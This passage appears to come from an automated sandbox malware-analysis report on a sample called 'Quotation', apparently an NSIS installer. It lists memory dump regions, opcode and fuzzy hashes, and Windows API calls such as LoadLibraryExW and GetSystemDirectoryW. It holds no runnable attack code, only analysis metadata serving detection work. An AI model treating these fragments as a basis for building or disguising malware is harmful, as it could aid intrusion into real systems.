                                                                                              • Opcode Fuzzy Hash: 03ebe23eb24dc15ba61f7b8790e8fe616dc9c6910af5a6bc7de06324d112dca2
                                                                                              • Instruction Fuzzy Hash: 871112B5C003488FCB20DFAAD845BDEBBF8EB48320F208419D558A3200D778A940CFA5
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL ref: 385E72FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: bb5938cb60c3e56fb894b564c24afa5f1c83201a952ada532e56669f09084e33
                                                                                              • Instruction ID: f667ca70b09f6c87cacb8859660b2792780872712dd529e12708a02970de19dd
                                                                                              • Opcode Fuzzy Hash: bb5938cb60c3e56fb894b564c24afa5f1c83201a952ada532e56669f09084e33
                                                                                              • Instruction Fuzzy Hash: CE11E2B5C003498FDB20DF9AD945BDEFBF4EB48324F20841AD918A7250D775A944CFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq
                                                                                              • API String ID: 0-3820536768
                                                                                              • Opcode ID: 1b86b40e069b80be149ec6d4df282124335bdbebee337449cee07b749d2cb35b
                                                                                              • Instruction ID: bd16b9306cdd38ff9b34425d0534b3bff17b851cd9b0f5d2dfea79846aa7e92c
                                                                                              • Opcode Fuzzy Hash: 1b86b40e069b80be149ec6d4df282124335bdbebee337449cee07b749d2cb35b
                                                                                              • Instruction Fuzzy Hash: B641E274B002058FEB1AAB78C86469EBBE3AF89740F204579D416DB351DF35DD02CBA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq
                                                                                              • API String ID: 0-3820536768
                                                                                              • Opcode ID: a6b9da0db81d24204c65d62812c7b5cb0426d307a0cad7022616372ab30a244d
                                                                                              • Instruction ID: e1d16ff788b469c30b69a4fc64f61a55b0e7d586c8dd005eb42d96f9ce97c2c1
                                                                                              • Opcode Fuzzy Hash: a6b9da0db81d24204c65d62812c7b5cb0426d307a0cad7022616372ab30a244d
                                                                                              • Instruction Fuzzy Hash: AC31C174B002058FEB19ABB8C8647AFBBA3AF88340F204569D416DB355DF35DD42CBA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: XPq
                                                                                              • API String ID: 0-1601936878
                                                                                              • Opcode ID: 78f3a2cb763dc521465a183169cf79940b18ace102d0555ecff5922a181a178e
                                                                                              • Instruction ID: a1ce6085a090cbbe17b035de2e68d8b994fb00310d8c76c06acda4bbdf652d64
                                                                                              • Opcode Fuzzy Hash: 78f3a2cb763dc521465a183169cf79940b18ace102d0555ecff5922a181a178e
                                                                                              • Instruction Fuzzy Hash: B7016D70A002099FDB159BA988257ADBAB2FF88304F20851EE801A7392CF390E06DF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1dd3b9a34318dff5e6638ab235a147f141dc61ae187845eece0a548e0bbcbcf1
                                                                                              • Instruction ID: 5c0f7a4c755ac28f6a959a7ed32ee61041c41d634abee814d7f0f8a3164f6f77
                                                                                              • Opcode Fuzzy Hash: 1dd3b9a34318dff5e6638ab235a147f141dc61ae187845eece0a548e0bbcbcf1
                                                                                              • Instruction Fuzzy Hash: E3A17875A00308CFEB14DB68C944B5EBBF2EF85315F248969E449AB255DB36EC42CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5b44d10884efea627e0b2619e830b22ed3c1bb301097dd2266e53ba0e92247e
                                                                                              • Instruction ID: fa2b450f998ada1da87389a71e5bad24a2bb18f98bccf2934af0a7af9e3b7e06
                                                                                              • Opcode Fuzzy Hash: f5b44d10884efea627e0b2619e830b22ed3c1bb301097dd2266e53ba0e92247e
                                                                                              • Instruction Fuzzy Hash: BC6194B5F002208BDB149A7DCC5069EBAD7AF94210F194439D80EEB364DEA5ED428BD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 46233a70332f9d0747a2fee80feb344eb5bc3aa3a44141f23718eefe41c394c8
                                                                                              • Instruction ID: 4ac804c6517a90ea40f05fc39f53c00762569c70bf079faadc781b286ee7089a
                                                                                              • Opcode Fuzzy Hash: 46233a70332f9d0747a2fee80feb344eb5bc3aa3a44141f23718eefe41c394c8
                                                                                              • Instruction Fuzzy Hash: B7814E74B002099FDB48DBB9C8A175EBBB3AF89304F108568D509EB355EF34DD429B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 45866600d781b5985eb6c37fdddae7943d7e8ea092915086e0497821132f79c6
                                                                                              • Instruction ID: 6bc2535096287554ae24f8d23c6ebf1fdcaf7d514f842a1e18443eb72ca25bdf
                                                                                              • Opcode Fuzzy Hash: 45866600d781b5985eb6c37fdddae7943d7e8ea092915086e0497821132f79c6
                                                                                              • Instruction Fuzzy Hash: 02813D74B002099FDB48DBA9C8A175EBBB3AF89304F108528D50AEB354EF74DD429B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b45dae3668d3b2369e700037a026d7f4296f9de8942b592fc30ea3a48879eef
                                                                                              • Instruction ID: 4226ab0c62b6c77353107ab150d7f9998f873972a9b1439ad4ffc37da3f09f5d
                                                                                              • Opcode Fuzzy Hash: 8b45dae3668d3b2369e700037a026d7f4296f9de8942b592fc30ea3a48879eef
                                                                                              • Instruction Fuzzy Hash: 6E812E74E00619CBEB10DFA8C880B9DB7B1FF89314F208699D549BB255EB70AA85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6edbeeacfe8b1ee7af96ea9c2916f5eaab678009e24964d0373c2c5c6fc114ac
                                                                                              • Instruction ID: 366dd8952c73810294cfee501a244f382b60ff2f83303a66dea8c2abac045ba9
                                                                                              • Opcode Fuzzy Hash: 6edbeeacfe8b1ee7af96ea9c2916f5eaab678009e24964d0373c2c5c6fc114ac
                                                                                              • Instruction Fuzzy Hash: 4951F5F8E04244CFEB118A6CCC8079ABB72EB45314F64896AD459EB28AC735D841DF71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e3d244a3b6a4196c17f3c1b66ec95491188d3e4b3c8e2fd8b2037f5bd448012
                                                                                              • Instruction ID: 101d76f89f1a5e41fecf9c9a8bcf1810bcc1f23d744399beba417536c072f8e2
                                                                                              • Opcode Fuzzy Hash: 6e3d244a3b6a4196c17f3c1b66ec95491188d3e4b3c8e2fd8b2037f5bd448012
                                                                                              • Instruction Fuzzy Hash: AF413DB5E00609CFEB20CE99D881AEFF7B2FB84350F10492AE156E7654D731E9458FA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e91706d2cbf0823af2c2dbf0787e4c560c751eb167f31c9fd69085dc399a331
                                                                                              • Instruction ID: 606ddb92c2424e600ccf62db274c79ed12e45f77948bf8d6c2edd24eae885e6d
                                                                                              • Opcode Fuzzy Hash: 2e91706d2cbf0823af2c2dbf0787e4c560c751eb167f31c9fd69085dc399a331
                                                                                              • Instruction Fuzzy Hash: 16314975A00705DFDB09CF78C89468EBBB2BF89300F108A19E816AB250DB71AC46CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1fb13053a6fe262253f9511e4e93e5016ccfb4b457d3f3d3f866ec7a6625b1a1
                                                                                              • Instruction ID: 264bc86662500bbb08f5b9c4bbb4d54506d7533a1493e889b487b0e1990f1685
                                                                                              • Opcode Fuzzy Hash: 1fb13053a6fe262253f9511e4e93e5016ccfb4b457d3f3d3f866ec7a6625b1a1
                                                                                              • Instruction Fuzzy Hash: B3311974E00709EBDB09CF79C895A9EF7B2BF89300F108919E916AB354DB71AC468B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 67ec831f42b4e3b74018c0dad5db04a5478f04dbb4c7030b173eeecef8fe4494
                                                                                              • Instruction ID: a0942e03e0207e962bd77e6e939c57ca2c3aa3b59ec70636ca05b51765fb4b50
                                                                                              • Opcode Fuzzy Hash: 67ec831f42b4e3b74018c0dad5db04a5478f04dbb4c7030b173eeecef8fe4494
                                                                                              • Instruction Fuzzy Hash: F4219C75A003059FEB05CF69C841A9EBBF6BF88310F10812AE904EB360DB35D881CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c035289610e992f7d6b9d605490d0743d96d2dda174301860c301ec63018423d
                                                                                              • Instruction ID: fecd03135af9e985060c8c61bcd3ca01766405c0c56a2e058bb2c6198d988f20
                                                                                              • Opcode Fuzzy Hash: c035289610e992f7d6b9d605490d0743d96d2dda174301860c301ec63018423d
                                                                                              • Instruction Fuzzy Hash: D8213D75A002159FDB04CF69C991A9EBBF5FB88310F108125E905E7350EB35DD41CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494916427.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_ad000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 243d7f46ba8b79c793e3052b3fca75c98ed1a8b6b5a1ae34c39d9884b3b5435f
                                                                                              • Instruction ID: ca79c51f973292237e9ec85c4c3776e4acd6ba6dbbfce2d92cfedc1fe6eef9fb
                                                                                              • Opcode Fuzzy Hash: 243d7f46ba8b79c793e3052b3fca75c98ed1a8b6b5a1ae34c39d9884b3b5435f
                                                                                              • Instruction Fuzzy Hash: 5721F575604204AFDB24DF60D9C4F16BBA1FB85314F24C66EE94A4F642C736D847CA62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 121d304eff125009703c9ccef48d1552535bb832e9b52a410b7fb1b9a06126b5
                                                                                              • Instruction ID: 59144e71a26b6b203a3f367592107815eadf89473c39e2edb1f387d3c5863c9a
                                                                                              • Opcode Fuzzy Hash: 121d304eff125009703c9ccef48d1552535bb832e9b52a410b7fb1b9a06126b5
                                                                                              • Instruction Fuzzy Hash: B4215675E007059FDB20DEA9DCC4AEFB7B2FB84310F104929E156A7554D734A846CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c46a74d245ea33809aaef1a1f30069558785a423255abd5f49c14d3b8d5ff8b1
                                                                                              • Instruction ID: 45b81d511ffc85f50dd7911ea125d1dcb5fd6f5c4fb9c91aaf68278f563c3e68
                                                                                              • Opcode Fuzzy Hash: c46a74d245ea33809aaef1a1f30069558785a423255abd5f49c14d3b8d5ff8b1
                                                                                              • Instruction Fuzzy Hash: C8118E35B002289FDB589A6DCC2469F77AAABC8350F10853AD405EB344DE35DD028BA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e386212d566858f98fd51d945f5af7de65e88a48313d5988973af68642c93c8e
                                                                                              • Instruction ID: 33ca99f9b63fe776bc2e2c01025c5b8b05f195f9166d356c1f1c968feaf245bd
                                                                                              • Opcode Fuzzy Hash: e386212d566858f98fd51d945f5af7de65e88a48313d5988973af68642c93c8e
                                                                                              • Instruction Fuzzy Hash: 7A21F2B5D00259AFCB10CF9AD984ADEFBB4FB48310F50822AE918A7240C3746950CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 030365f6791e9d705d6ee9c8bc3285d3ffaf91488b9f00aad4f31d180a2ea5fe
                                                                                              • Instruction ID: 0ab0964f2e11fe62077dcf3efe41669924b6a4939fa991104538731b1d5740f8
                                                                                              • Opcode Fuzzy Hash: 030365f6791e9d705d6ee9c8bc3285d3ffaf91488b9f00aad4f31d180a2ea5fe
                                                                                              • Instruction Fuzzy Hash: 8001F5767001945BDB45967D9C342DF7FABABC9310F04407AD505EB240DB248D02CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 07b82fcaab6d6c79015f585aa8a1bc1d12ad47002df3299b8449c248b56eac51
                                                                                              • Instruction ID: 99a24918617968dbb85f465b7197762a6f4af106155ed22dbb5d15955769e8d4
                                                                                              • Opcode Fuzzy Hash: 07b82fcaab6d6c79015f585aa8a1bc1d12ad47002df3299b8449c248b56eac51
                                                                                              • Instruction Fuzzy Hash: FB11E4B5D01219AFCB10CF9AD984ADEFBB4FB48310F50812AE918A7340C3746954CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66902313466fa82fd2028ff16ef587aeac05afb02cb3c0f3b9ec89afd276f757
                                                                                              • Instruction ID: 0d867cabcfa2af2896c221df1cb42b053b51168880eb281d80ec9135b33404b2
                                                                                              • Opcode Fuzzy Hash: 66902313466fa82fd2028ff16ef587aeac05afb02cb3c0f3b9ec89afd276f757
                                                                                              • Instruction Fuzzy Hash: B2F0C278B002108FEB10926ED4A170EA2D6DBC8315F10C93AF10ECB345DA25DD434B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d7e26e514d73c089879c07f579590fe5e6ce87b0299d03730d0c20bc1ba2adce
                                                                                              • Instruction ID: d5e4c6befffd8c3a2143a4adf083a573c3b5d7c06cd5ddb3832723c21bd47376
                                                                                              • Opcode Fuzzy Hash: d7e26e514d73c089879c07f579590fe5e6ce87b0299d03730d0c20bc1ba2adce
                                                                                              • Instruction Fuzzy Hash: CBE048B5A54384AAEF00DFB49D4474D7BB9DB46248F6189E6D449CB101D271CA418B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8c2149c8404fdb3d378cb6846175523c8f02b307357daa6c7fb311a4fbcfcf5a
                                                                                              • Instruction ID: 80a839c1b846100bea398ec727382811e43cd92bddfe590d5dff40ea79a499f6
                                                                                              • Opcode Fuzzy Hash: 8c2149c8404fdb3d378cb6846175523c8f02b307357daa6c7fb311a4fbcfcf5a
                                                                                              • Instruction Fuzzy Hash: E4E012B5B14208EBEF00CEB8CD4574E77ADEB46298F6085A5D449D7205E676DA028B90
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorModeVersion
                                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                                              • API String ID: 3050056751-1170945346
                                                                                              • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                              • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                                              • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                              • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                              • wsprintfW.USER32 ref: 004061CF
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                              • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                              • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                              • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                                • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                                • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495712410.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495671740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495758213.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495799657.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495942530.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                              • API String ID: 2547128583-890815371
                                                                                              • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                              • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                              • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                              • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD